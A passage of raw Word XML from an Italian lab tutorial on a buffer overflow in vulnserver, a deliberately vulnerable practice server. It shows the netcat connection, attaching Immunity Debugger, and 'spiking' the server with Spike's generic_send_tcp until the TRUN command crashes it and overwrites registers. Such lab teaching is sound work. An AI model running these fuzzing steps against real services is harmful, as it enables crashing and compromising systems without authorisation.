          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F7EF5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F7EF5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>nv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F7EF5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> INDIRIZZO_HOST 9999</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Una volta stabilita la connessione, usando il comando </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7EF5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>HELP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> vedremo una serie di comandi eseguibili sul server. Ogni comando accetterà un buffer di caratteri, una stringa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABC6D6B" w14:textId="20595B2E" w:rsidR="00851D8C" w:rsidRDefault="00851D8C" w:rsidP="00851D8C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56805E2F" wp14:editId="020704C1">
            <wp:extent cx="2572873" cy="2026138"/>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3890" cy="2034814"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="632794FF" wp14:editId="00774A66">
            <wp:extent cx="2561492" cy="2017424"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>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77652" cy="2030152"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9D29B5" w14:textId="56EE2ADD" w:rsidR="00851D8C" w:rsidRDefault="00851D8C" w:rsidP="00851D8C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">A questo punto, verificata la connessione, possiamo usare il comando </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7EF5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>EXIT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">per disconnetterci dal server, aprire </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Immunity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Debugger (</w:t>
      </w:r>
      <w:r w:rsidRPr="00851D8C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>come amministratore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">), cliccare in alto </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7EF5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">File &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F7EF5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Attach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> e scegliere il processo (PID) di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>vulnserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> attivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0BB606" w14:textId="09EF3F73" w:rsidR="00851D8C" w:rsidRDefault="00851D8C" w:rsidP="00851D8C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="182A8893" wp14:editId="1D6C5C42">
            <wp:extent cx="3388500" cy="1607234"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>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3404660" cy="1614899"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1368C2D4" w14:textId="77777777" w:rsidR="003F67D9" w:rsidRDefault="003F67D9" w:rsidP="008C1448">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Una volta fatto ciò, il nostro processo sarà messo “in pausa”, quindi, in alto, cliccare la spunta “play” per cambiare lo stato del processo in “Running”, com’è visibile anche in basso a destra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A61C61E" w14:textId="31F493C3" w:rsidR="00851D8C" w:rsidRPr="00851D8C" w:rsidRDefault="003F67D9" w:rsidP="003F67D9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FE3D262" wp14:editId="71E3244D">
            <wp:extent cx="1470660" cy="19812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20">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1470660" cy="198120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="738D043C" w14:textId="1C76A258" w:rsidR="003F67D9" w:rsidRDefault="003F67D9" w:rsidP="008C1448">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Da adesso, il debugger è agganciato al server, riuscendo a vedere così registri, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>dump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> e istruzioni.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3EDBB8" w14:textId="77777777" w:rsidR="003F67D9" w:rsidRDefault="003F67D9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CC90BE" w14:textId="5324C6CF" w:rsidR="003F67D9" w:rsidRPr="008C1448" w:rsidRDefault="003F67D9" w:rsidP="003441B6">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc76047767"/>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Spiking</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="24AB04FD" w14:textId="5360A633" w:rsidR="002343CF" w:rsidRDefault="00C419AC" w:rsidP="003F67D9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>La procedura di “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Spiking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">” è un metodo che ci consente di scoprire se tra quei comandi disponibili (STATS, RTIME, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>ecc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>…), ovvero tra quei buffer di caratteri che accetta, ce ne sia uno capace di mandare in crash il software a causa di un overflow di quel buffer. Faremo uso, quindi, di</w:t>
      </w:r>
      <w:r w:rsidR="002343CF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Spike, un programma integrato con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002343CF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002343CF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">che ci permetterà di mandare pacchetti TCP/UDP senza fermarsi, vedendo così se il programma va in crash. Il codice del file che lanceremo sarà riportato sotto. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFAD2A1" w14:textId="67594FDC" w:rsidR="002343CF" w:rsidRDefault="002343CF" w:rsidP="003F67D9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Per lanciarlo, dal terminale di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F7EF5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>generic_send_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F7EF5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP_HOST 9999 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F7EF5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>stats.spk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F7EF5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68599791" w14:textId="60BA1749" w:rsidR="002343CF" w:rsidRDefault="002343CF" w:rsidP="003F67D9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Manderemo quindi in esecuzione questo file sul comando STATS di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>vulnserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">. Aspettando qualche secondo ci renderemo conto che il comando non è vulnerabile, infatti non vedremo nessun crash. Questa operazione si ripete per gli altri comandi, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>finchè</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> non arriviamo a quello giusto che interesserà a noi: TRUN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1C2F79" w14:textId="534673DA" w:rsidR="002343CF" w:rsidRDefault="002343CF" w:rsidP="003F67D9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Creiamo quindi il file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F7EF5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>trun.spk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> e lanciamolo con Spike</w:t>
      </w:r>
      <w:r w:rsidR="001063E0">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001063E0" w:rsidRPr="004F7EF5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>generic_send_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001063E0" w:rsidRPr="004F7EF5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP_HOST 9999 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001063E0" w:rsidRPr="004F7EF5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>trun.spk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001063E0" w:rsidRPr="004F7EF5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0 0</w:t>
      </w:r>
      <w:r w:rsidR="001063E0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">. Dopo qualche secondo, aprendo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Immunity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Debugger, noteremo il crash, per la precisione noteremo un “Access </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Violation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">”, </w:t>
      </w:r>
      <w:r w:rsidR="001063E0">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">ovvero abbiamo toccato aree di memoria di non nostra competenza. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D764C3" w14:textId="02F862B5" w:rsidR="001063E0" w:rsidRPr="002343CF" w:rsidRDefault="001063E0" w:rsidP="001063E0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="759322C3" wp14:editId="575F880A">
            <wp:extent cx="3268980" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="762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1">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3268980" cy="190500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A82F44A" wp14:editId="6AB6D438">
            <wp:extent cx="4069080" cy="1280160"/>
            <wp:effectExtent l="0" t="0" r="7620" b="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4069080" cy="1280160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDF3164" w14:textId="321A56B4" w:rsidR="00937CAE" w:rsidRDefault="001063E0" w:rsidP="003F67D9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Come possiamo notare, c’è stato un overflow e abbiamo sovrascritto anche i registri (41414141 è il codice per il carattere “A”).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377CF7E8" w14:textId="51B59DEA" w:rsidR="0069256B" w:rsidRDefault="0069256B" w:rsidP="003F67D9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Possiamo quindi procedere alla prossima fase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F77EA68" w14:textId="5F7CE52D" w:rsidR="0069256B" w:rsidRPr="00225C29" w:rsidRDefault="0069256B" w:rsidP="003F67D9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00225C29">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5570E043" w14:textId="3B4CAFC7" w:rsidR="0069256B" w:rsidRPr="00225C29" w:rsidRDefault="00AF62C8" w:rsidP="003F67D9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="0069256B" w:rsidRPr="00225C29">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>stats.spk</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="08002B34" w14:textId="3B7185B5" w:rsidR="0069256B" w:rsidRPr="00225C29" w:rsidRDefault="00AF62C8" w:rsidP="003F67D9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="0069256B" w:rsidRPr="00225C29">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>trun.spk</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D23540A" w14:textId="77777777" w:rsidR="0069256B" w:rsidRPr="00225C29" w:rsidRDefault="0069256B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00225C29">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAC7472" w14:textId="0ABC6F4C" w:rsidR="0069256B" w:rsidRPr="008C1448" w:rsidRDefault="0069256B" w:rsidP="003441B6">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
